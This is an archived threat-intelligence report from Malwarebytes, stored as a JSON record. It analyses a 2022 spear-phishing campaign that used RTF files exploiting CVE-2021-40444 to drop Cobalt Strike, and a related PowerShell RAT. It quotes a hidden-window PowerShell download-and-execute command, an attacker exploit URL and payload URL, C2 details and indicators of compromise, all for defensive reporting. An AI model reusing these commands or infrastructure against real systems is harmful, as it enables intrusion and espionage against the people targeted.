{ "id": "cd49237d-3c87-4bee-aa44-2ec2763bb776", "created_at": "2026-04-06T00:13:38.983538Z", "updated_at": "2026-04-10T03:36:33.618414Z", "deleted_at": null, "sha1_hash": "cc65fac49d2b42618b3799cec854e6006489b310", "title": "New spear phishing campaign targets Russian dissidents", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1105284, "plain_text": "New spear phishing campaign targets Russian dissidents\r\nBy Mark Stockley\r\nPublished: 2022-03-28 · Archived: 2026-04-05 18:49:25 UTC\r\nThis blog post was authored by Hossein Jazi.\r\n— Updated to clarify the two different campaigns (Cobalt Strike and Rat)\r\nSeveral threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The\r\nMalwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated\r\nwith the geopolitical conflict.\r\nMore specifically, we’ve witnessed several APT actors such as Mustang Panda, UNC1151and SCARABthat have\r\nused war-related themes to target mostly Ukraine. We’ve also observed several different wipersand cybercrime\r\ngroups such as FormBookusing the same tactics. Beside those known groups we saw an actorthat used multiple\r\nmethods to deploy a variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199\r\nand CVE-2021-40444, macro-embedded documents, and executables.\r\nOn March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and\r\ngovernment entities. Based on the email content it is likely that the threat actor is targeting people that are against\r\nthe Russian government.\r\nArticle continues below this ad.\r\nThe spear phishing emails are warning people that use websites, social networks, instant messengers and VPN\r\nservices that have been banned by the Russian Government and that criminal charges will be laid. Victims are\r\nlured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\r\nSpear phishing as the main initial infection vector\r\nThese emails pretend to be from the “Ministry of Digital Development, Telecommunications and Mass\r\nCommunications of the Russian Federation” and “Federal Service for Supervision of Communications,\r\nInformation Technology and Mass Communications” of Russia.\r\nWe have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though\r\nCVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time\r\nwe observed an attacker use RTF files instead of Word documents to exploit this vulnerability. Also the actor\r\nleveraged a new variant of this exploit called CABLESS in this attack. Sophoshas reported an attack that used a\r\nCabless variant of this exploit but in that case the actor has not used the RTF file and also used RAR file to\r\nprepend the WSF data to it.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 1 of 10\n\nEmail with RTF file:\r\nФедеральная служба по надзору в сфере связи, информационных технологий и массовых\r\nкоммуникаций(Federal Service for Supervision of Communications, Information Technology and\r\nMass Communications)\r\nПредупреждение! Министерство цифрового развития, связи и массовых коммуникаций\r\nРоссийской Федерации(A warning! Ministry of Digital Development, Telecommunications and\r\nMass Media of the Russian Federation)\r\nEmail with archive file:\r\nинформирование населения об критических изменениях в сфере цифровых технологий,\r\nсервисов, санкций и уголовной ответственности за их использование. (informing the public\r\nabout critical changes in the field of digital technologies, services, sanctions and criminal liability\r\nfor their use.)\r\nВнимание! Информирует Министерство цифрового развития, связи и массовых\r\nкоммуникаций Российской Федерации(Attention! Informs the Ministry of Digital Development,\r\nCommunications and Mass Media of the Russian Federation)\r\nEmail with link:\r\nВнимание! Информирует Министерство цифрового развития, связи и массовых\r\nкоммуникаций Российской Федерации(Attention! Informs the Ministry of Digital Development,\r\nCommunications and Mass Media of the Russian Federation)\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 2 of 10\n\nVictimology\r\nThe actor has sent its spear phishing emails to people that had email with these domains:\r\nmail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru,\r\n38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net\r\nBased on these domains, here is the list of potential victims:\r\nPortal of authorities of the Chuvash Republic Official Internet portal\r\nRussian Ministry of Internal Affairs\r\nministry of education and science of the republic of Altai\r\nMinistry of Education of the Stavropol Territory\r\nMinister of Education and Science of the Republic of North Ossetia-Alania\r\nGovernment of Astrakhan region\r\nMinistry of Education of the Irkutsk region\r\nPortal of the state and municipal service Moscow region\r\nMinistry of science and higher education of the Russian Federation\r\nAnalysis:\r\nThe lures used by the threat actor are in Russian language and pretend to be from Russia’s “Ministry of\r\nInformation Technologies and Communications of the Russian Federation” and “MINISTRY OF DIGITAL\r\nDEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS”. One of them is a letter about\r\nlimitation of access to Telegram application in Russia.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 3 of 10\n\nThese RTF files contains an embedded url that downloads an html file which exploits the vulnerability in the\r\nMSHTML engine.\r\nhttp://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html\r\nThe html file contains a script that executes the script in WSF data embedded in the RTF file.\r\nThe actor has added WSF data (Windows Script Host) at the start of the RTF file. As you can see from figure 8,\r\nWSF data contains a JScript code that can be accessed from a remote location. In this case this data has been\r\naccessed using the downloaded html exploit file.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 4 of 10\n\nExecuting this scripts leads to spawning PowerShell to download a CobaltStrike beacon from the remote server\r\nand execute it on the victim’s machine. (The deployed CobaltStrike file name is Putty)\r\n\"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe\" -windowstyle hidden $ProgressPreference='SilentlyContinu\r\nThe following shows the CobaltStrike config:\r\n{ \"BeaconType\": [ \"HTTPS\" ], \"Port\": 443, \"SleepTime\": 38500, \"MaxGetSize\": 1398151, \"Jitter\": 27, \"C2Server\":\r\nSimilar lure used by another actor\r\nWe also have identified activity by another actor that uses a similar lure as the one used in the previously\r\nmentioned campaign. This activity is potentially related to Carbon Spiderand uses “Федеральная служба по\r\nнадзору в сфере связи, информационных технологий и массовых коммуникаций” (Federal Service for\r\nSupervision of Communications, Information Technology and Mass Communications) of Russia as a template. In\r\nthis case, the threat actor has deployed a PowerShell-based Rat.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 5 of 10\n\nThe dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 6 of 10\n\nAfter deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the\r\ncapability to get the next stage payload and execute it. The next stage payload can be one of the following file\r\ntypes:\r\nJavaScript\r\nPowerShell\r\nExecutable\r\nDLL\r\nAll of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some\r\nconfigurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with\r\n“Madagascar” which probably is another alias of the actor.\r\nAfter setting up the configuration, it calls the “Initialize-Engine” function. This function collects the victim’s info\r\nincluding OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a\r\ndomain member or not. It then appends all the collected into into a string and separate them by “|” character and at\r\nthe end it add the group name and API config value. The created string is being send to the server using Send-WebInitfunction. This function adds “INIT%%%” string to the created string and base64 encodes it and sends it to\r\nthe server.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 7 of 10\n\nAfter performing the initialization, it goes into a loop that keeps calling the “Invoke-Engine” function. This\r\nfunction checks the incoming tasks from the server, decodes them and calls the proper function to execute the\r\nincoming task. If there is no task to execute, it sends “GETTASK%%” in Base64 format to its server to show it is\r\nready to get tasks and execute them. The “IC” command is used to delete itself.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 8 of 10\n\nThe result of the task execution will be send to the server using “PUTTASK%%” command.\r\nInfrastructure\r\nThe following shows the infrastructure used by this actor highlighting that the different lures are all connected.\r\nThe Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are\r\nprotecting our customers and sharing additional indicators of compromise.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 9 of 10\n\nIOCs\r\nRTF files host domain:\r\ndigital-ministry[.]ru\r\nRTF files:\r\nPKH telegram.rtf\r\nb19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e\r\nPKH.rtf\r\n38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20\r\nMSHTML exploit:\r\nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html\r\n4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c\r\nCobaltStrike Download URL:\r\nwallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe\r\nCobaltStrike:\r\nPutty.exe\r\nd4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d\r\nCobaltStrike C2:\r\nwikipedia-book[.]vote/async/newtab_ogb\r\nMacro based maldoc:\r\nc7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28\r\nPowerShell based RAT:\r\n9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0\r\nPowerShell Rat C2:\r\nswordoke[.]com\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/" ], "report_names": [ "new-spear-phishing-campaign-targets-russian-dissidents" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434418, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cc65fac49d2b42618b3799cec854e6006489b310.pdf", "text": "https://archive.orkl.eu/cc65fac49d2b42618b3799cec854e6006489b310.txt", "img": "https://archive.orkl.eu/cc65fac49d2b42618b3799cec854e6006489b310.jpg" } }